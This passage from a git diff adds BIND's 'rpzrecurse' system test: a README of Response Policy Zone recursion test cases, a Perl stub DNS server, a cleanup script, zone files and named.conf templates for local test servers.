"status (DNSRPS sub-test): $status ($pf)";; + *) echo_i "invalid test mode";; + esac +done +status=`expr ${native:-0} + ${dnsrps:-0}` + +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rpzrecurse/README b/bin/tests/system/rpzrecurse/README new file mode 100644 index 0000000..5936e05 --- /dev/null +++ b/bin/tests/system/rpzrecurse/README @@ -0,0 +1,124 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +These tests check RPZ recursion behavior (including skipping +recursion when appropriate). + +The general structure of the tests is: + +* The resolver (ns2) with an unqualified view containing the policy + zones, the response-policy statement, and a root hint zone + +* The auth server that contains two authoritative zones, l1.l0 and + l2.l1.l0, both delegated to itself. l2.l1.l0 specifies a non-existent + zone data file and so will generate SERVFAILs for any queries to it. + +The l2.l1.l0 zone was chosen to generate SERVFAIL responses because RPZ +evaluation will use that error response whenever it encounters it during +processing, thus making it a binary indicator for whether or not +recursion was attempted. This also allows us to not worry about having +to craft 'ip', 'nsdname', and 'nsip' rules that matched the queries. + +Each test is intended to be fed a number of queries constructed as +qXX.l2.l1.l0, where XX is the 1-based query sequence number (e.g. the +first query of each test is q01.l2.l1.l0). + +For all the tests the triggers are constructed as follows: +client-ip - match 127.0.0.1/32 +ip - match 255.255.255.255/32 (does not matter due to SERVFAIL) +nsdname - match ns.example.org (also does not matter) +nsip - match 255.255.255.255/32 (also does not matter) +qname - match qXX.l2.l1.l0, where XX is the query sequence number that +is intended to be matched by this qname rule. + +Here's the detail on the test cases: + +Group 1 - testing skipping recursion for a single policy zone with only +records that allow recursion to be skipped + +Test 1a: + 1 policy zone containing 1 'client-ip' trigger + 1 query, expected to skip recursion + +Test 1b: + 1 policy zone containing 1 'qname' trigger (q01) + 2 queries, q01 is expected to skip recursion, q02 is expected to + recurse + +Test 1c: + 1 policy zone containing both a 'client-ip' and 'qname' trigger (q02) + 1 query, expected to skip recursion + +Group 2 - testing skipping recursion with multiple policy zones when all +zones have only trigger types eligible to skip recursion with + +Test 2a: + 32 policy zones, each containing 1 'qname' trigger (qNN, where NN is + the zone's sequence 1-based sequence number formatted to 2 digits, + so each of the first 32 queries should match a different zone) + 33 queries, the first 32 of which are expected to skip recursion + while the 33rd is expected to recurse + +Group 3 - Testing interaction of triggers that require recursion when in +a single zone, both alone and with triggers that allow recursion to be +skipped + +Test 3a: + 1 policy zone containing 1 'ip' trigger + 1 query, expected to recurse + +Test 3b: + 1 policy zone containing 1 'nsdname' trigger + 1 query, expected to recurse + +Test 3c: + 1 policy zone containing 1 'nsip' trigger + 1 query, expected to recurse + +Test 3d: + 1 policy zone containing 1 'ip' trigger and 1 'qname' trigger (q02) + 2 queries, the first should not recurse and the second should recurse + +Test 3e: + 1 policy zone containing 1 'nsdname' trigger and 1 'qname' trigger + (q02) + 2 queries, the first should not recurse and the second should recurse + +Test 3f: + 1 policy zone containing 1 'nsip' trigger and 1 'qname' trigger (q02) + 2 queries, the first should not recurse and the second should recurse + +Group 4 - contains 32 subtests designed to verify that recursion is +skippable for only the appropriate zones based on the order specified in +the 'response-policy' statement + +Tests 4aa to 4bf: + 32 policy zones per test, one of which is configured with 1 'ip' + trigger and one 'qname' trigger while the others are configured + only with 1 'qname' trigger. The zone with both triggers starts + listed first and is moved backwards by one position with each + test. The 'qname' triggers in the zones are structured so that + the zones are tested starting with the first zone and the 'ip' + trigger is tested before the 'qname' trigger for that zone. + 33 queries per test, where the number expected to skip recursion + matches the test sequence number: e.g. 1 skip for 4aa, 26 skips + for 4az, and 32 skips for 4bf + +Group 5 - This test verifies that the "pivot" policy zone for whether or +not recursion can be skipped is the first listed zone with applicable +trigger types rather than a later listed zone. + +Test 5a: + 5 policy zones, the 1st, 3rd, and 5th configured with 1 'qname' + trigger each (q01, q04, and q06, respectively), the 2nd and 4th + each configured with an 'ip' and 'qname' trigger (q02 and q05, + respectively for the 'qname' triggers + 6 queries, of which only q01 and q02 are expected to skip recursion diff --git a/bin/tests/system/rpzrecurse/ans5/ans.pl b/bin/tests/system/rpzrecurse/ans5/ans.pl new file mode 100644 index 0000000..9c5efb3 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ans5/ans.pl @@ -0,0 +1,81 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.5", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +for (;;) { + $sock->recv($buf, 512); + + print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n"; + + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + my $donotrespond = 0; + + $packet->header->aa(1); + if ($qtype eq "A") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 A 10.53.0.5")); + #} elsif ($qtype eq "AAAA") { + #$packet->push("answer", + #new Net::DNS::RR($qname . + #" 300 AAAA 2001:db8:beef::1")); + } elsif ($qtype eq "NS") { + $donotrespond = 1; + } + + if ($donotrespond == 0) { + $sock->send($packet->data); + print "RESPONSE:\n"; + $packet->print; + print "\n"; + } else { + print "DROP:\n"; + } +} diff --git a/bin/tests/system/rpzrecurse/clean.sh b/bin/tests/system/rpzrecurse/clean.sh new file mode 100644 index 0000000..7b1a8a9 --- /dev/null +++ b/bin/tests/system/rpzrecurse/clean.sh @@ -0,0 +1,34 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Clean up after rpz tests. + +rm -f dig.out.* + +rm -f ns*/named.lock +rm -f ns*/named.memstats +rm -f ns*/*.run +rm -f ns*/*core *core +rm -f ns*/named.conf + +rm -f ns2/*.local +rm -f ns2/*.queries +rm -f ns2/named.[0-9]*.conf +rm -f ns2/named.conf.header + +rm -f ns3/named2.conf +rm -f ns3/named.run.prev + +rm -f dnsrps*.conf dnsrpzd* +rm -f ns*/session.key +rm -f ns*/managed-keys.bind* ns*/*.mkeys* diff --git a/bin/tests/system/rpzrecurse/ns1/db.l0 b/bin/tests/system/rpzrecurse/ns1/db.l0 new file mode 100644 index 0000000..e6077fc --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns1/db.l0 @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 10.53.0.1 +l1 NS ns.l1 +ns.l1 A 10.53.0.1 diff --git a/bin/tests/system/rpzrecurse/ns1/db.l1.l0 b/bin/tests/system/rpzrecurse/ns1/db.l1.l0 new file mode 100644 index 0000000..f51d5f7 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns1/db.l1.l0 @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 10.53.0.1 +l2 NS ns.l2 +ns.l2 A 10.53.0.1 diff --git a/bin/tests/system/rpzrecurse/ns1/example.com.db b/bin/tests/system/rpzrecurse/ns1/example.com.db new file mode 100644 index 0000000..3bd11ec --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns1/example.com.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA ns.example.com. root.example.com. 1 3600 3600 3600 3600 +@ NS ns.example.com. + +ns.example.com. A 10.53.0.1 +@ A 1.2.3.4 +www A 1.2.3.5 diff --git a/bin/tests/system/rpzrecurse/ns1/example.db b/bin/tests/system/rpzrecurse/ns1/example.db new file mode 100644 index 0000000..0e71776 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns1/example.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA root.example. example. 1 3600 3600 3600 3600 +@ IN NS ns.example. +www IN CNAME cname +cname IN A 10.53.0.1 diff --git a/bin/tests/system/rpzrecurse/ns1/named.conf.in b/bin/tests/system/rpzrecurse/ns1/named.conf.in new file mode 100644 index 0000000..f1e4c5c --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns1/named.conf.in @@ -0,0 +1,75 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + querylog yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type master; + file "root.db"; +}; + +zone "test.example.org" { + type master; + file "example.db"; +}; + +zone "l0" { + type master; + file "db.l0"; +}; + +zone "l1.l0" { + type master; + file "db.l1.l0"; +}; + +zone "l2.l1.l0" { + type master; + file "does-not-exist"; +}; + +zone "test1.example.net" { + type master; + file "test1.example.net.db"; +}; + +zone "test2.example.net" { + type master; + file "test2.example.net.db"; +}; + +zone "example.com" { + type master; + file "example.com.db"; +}; diff --git a/bin/tests/system/rpzrecurse/ns1/root.db b/bin/tests/system/rpzrecurse/ns1/root.db new file mode 100644 index 0000000..51be203 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA muks.isc.org. a.root.servers.nil. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.example. +ns.example. A 10.53.0.1 + +l0. NS ns.l0. +ns.l0. A 10.53.0.1 diff --git a/bin/tests/system/rpzrecurse/ns1/test1.example.net.db b/bin/tests/system/rpzrecurse/ns1/test1.example.net.db new file mode 100644 index 0000000..66ca007 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns1/test1.example.net.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA root.example. example. 1 3600 3600 3600 3600 +@ NS ns.example. +ns.example. A 10.53.0.1 +test1.example.net. A 1.2.3.4 +www.test1.example.net. A 5.6.7.8 diff --git a/bin/tests/system/rpzrecurse/ns1/test2.example.net.db b/bin/tests/system/rpzrecurse/ns1/test2.example.net.db new file mode 100644 index 0000000..57db115 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns1/test2.example.net.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA root.example. example. 1 3600 3600 3600 3600 +@ NS ns.example. +ns.example. A 10.53.0.1 +test2.example.net. A 8.7.6.5 +www.test2.example.net. A 4.3.2.1 diff --git a/bin/tests/system/rpzrecurse/ns2/db.clientip1 b/bin/tests/system/rpzrecurse/ns2/db.clientip1 new file mode 100644 index 0000000..f0d53d2 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.clientip1 @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +32.4.0.53.10.rpz-client-ip A 10.53.0.2 +24.0.0.53.10.rpz-client-ip A 10.53.0.1 diff --git a/bin/tests/system/rpzrecurse/ns2/db.clientip2 b/bin/tests/system/rpzrecurse/ns2/db.clientip2 new file mode 100644 index 0000000..dfcc341 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.clientip2 @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +24.0.0.53.10.rpz-client-ip A 10.53.0.3 diff --git a/bin/tests/system/rpzrecurse/ns2/db.clientip21 b/bin/tests/system/rpzrecurse/ns2/db.clientip21 new file mode 100644 index 0000000..4ce2af1 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.clientip21 @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +32.3.0.53.10.rpz-client-ip A 10.53.0.1 +31.2.0.53.10.rpz-client-ip CNAME . diff --git a/bin/tests/system/rpzrecurse/ns2/db.given b/bin/tests/system/rpzrecurse/ns2/db.given new file mode 100644 index 0000000..d464a53 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.given @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN given.zone. +$TTL 3600 +@ IN SOA ns.given.zone. hostmaster.given.zone. 1 600 300 604800 3600 + IN NS ns.given.zone. + +ns.given.zone. IN A 127.0.0.1 +; this should be ignored as it matches an earlier passthru entry. +example.com CNAME . +; this should be ignored as it matches an earlier wildcard passthru entry. +www.example.com CNAME . diff --git a/bin/tests/system/rpzrecurse/ns2/db.invalidprefixlength b/bin/tests/system/rpzrecurse/ns2/db.invalidprefixlength new file mode 100644 index 0000000..f496670 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.invalidprefixlength @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +1000.4.0.53.10.rpz-client-ip A 10.53.0.1 diff --git a/bin/tests/system/rpzrecurse/ns2/db.log1 b/bin/tests/system/rpzrecurse/ns2/db.log1 new file mode 100644 index 0000000..495885b --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.log1 @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +32.4.0.53.10.rpz-client-ip A 10.53.0.4 diff --git a/bin/tests/system/rpzrecurse/ns2/db.log2 b/bin/tests/system/rpzrecurse/ns2/db.log2 new file mode 100644 index 0000000..91ff8c5 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.log2 @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +32.4.0.53.10.rpz-client-ip A 10.53.0.4 +32.3.0.53.10.rpz-client-ip A 10.53.0.3 diff --git a/bin/tests/system/rpzrecurse/ns2/db.log3 b/bin/tests/system/rpzrecurse/ns2/db.log3 new file mode 100644 index 0000000..65ed980 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.log3 @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +32.4.0.53.10.rpz-client-ip A 10.53.0.4 +32.3.0.53.10.rpz-client-ip A 10.53.0.3 +32.2.0.53.10.rpz-client-ip A 10.53.0.2 diff --git a/bin/tests/system/rpzrecurse/ns2/db.passthru b/bin/tests/system/rpzrecurse/ns2/db.passthru new file mode 100644 index 0000000..eac3533 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.passthru @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN passthru.zone. +$TTL 3600 +@ IN SOA ns.passthru.zone. hostmaster.passthru.zone. 1 600 300 604800 3600 + IN NS ns.passthru.zone. + +ns.passthru.zone. IN A 127.0.0.1 + +example.com CNAME rpz-passthru. +*.example.com CNAME rpz-passthru. diff --git a/bin/tests/system/rpzrecurse/ns2/db.wildcard1 b/bin/tests/system/rpzrecurse/ns2/db.wildcard1 new file mode 100644 index 0000000..3e5c78f --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.wildcard1 @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +*.test1.example.net CNAME . +test1.example.net CNAME . diff --git a/bin/tests/system/rpzrecurse/ns2/db.wildcard2a b/bin/tests/system/rpzrecurse/ns2/db.wildcard2a new file mode 100644 index 0000000..3e5c78f --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.wildcard2a @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +*.test1.example.net CNAME . +test1.example.net CNAME . diff --git a/bin/tests/system/rpzrecurse/ns2/db.wildcard2b b/bin/tests/system/rpzrecurse/ns2/db.wildcard2b new file mode 100644 index 0000000..f8e6123 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.wildcard2b @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +*.test2.example.net CNAME . +test2.example.net CNAME . diff --git a/bin/tests/system/rpzrecurse/ns2/db.wildcard3 b/bin/tests/system/rpzrecurse/ns2/db.wildcard3 new file mode 100644 index 0000000..5354c04 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.wildcard3 @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +*.test1.example.net CNAME . diff --git a/bin/tests/system/rpzrecurse/ns2/named.clientip.conf b/bin/tests/system/rpzrecurse/ns2/named.clientip.conf new file mode 100644 index 0000000..8df90a3 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.clientip.conf @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "clientip1"; + zone "clientip2"; + } qname-wait-recurse no + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "clientip1" { type master; file "db.clientip1"; }; + zone "clientip2" { type master; file "db.clientip2"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.clientip2.conf b/bin/tests/system/rpzrecurse/ns2/named.clientip2.conf new file mode 100644 index 0000000..8c15909 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.clientip2.conf @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + servfail-ttl 0; + + # policy configuration to be tested + response-policy { + zone "clientip21"; + } qname-wait-recurse no + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "clientip21" { type master; file "db.clientip21"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.conf.header.in b/bin/tests/system/rpzrecurse/ns2/named.conf.header.in new file mode 100644 index 0000000..77c3c6a --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.conf.header.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + querylog yes; + + # let ns3 start dnsrpzd + include "../dnsrps-slave.conf"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + diff --git a/bin/tests/system/rpzrecurse/ns2/named.default.conf b/bin/tests/system/rpzrecurse/ns2/named.default.conf new file mode 100644 index 0000000..929b88f --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.default.conf @@ -0,0 +1,25 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.invalidprefixlength.conf b/bin/tests/system/rpzrecurse/ns2/named.invalidprefixlength.conf new file mode 100644 index 0000000..c7dad28 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.invalidprefixlength.conf @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + 